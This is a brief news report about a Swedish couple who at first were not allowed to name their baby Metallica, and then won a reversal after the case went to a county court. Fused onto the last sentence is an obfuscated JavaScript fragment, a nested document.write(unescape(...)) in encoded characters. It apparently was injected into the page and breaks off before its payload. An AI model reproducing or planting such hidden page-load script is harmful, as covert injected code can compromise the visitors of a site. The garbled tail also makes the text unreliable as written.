A Swedish family who were told they could not call their child Metallica have successfully had the decision reversed.
Earlier this month, it emerged that tax officials in Gothenburg had objected to Michael and Karolina Tomaro's choice of name for their six-month-old girl.
Apparently deeming it "inappropriate", the news made it impossible for the Tomaro family to take little Metallica abroad, as she could not get a passport.
However, authorities are now understood to have relented and withdrawn their objections, after the case was discussed by the county court.
Metallica's mother, Karolina, has spoken of her relief at the decision: "It feels good", she told Göteborgs-Posten.
"Several people suggested I should move to where they live, because then our daughter wouldn't have any problem in being named Metallica", she explained.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
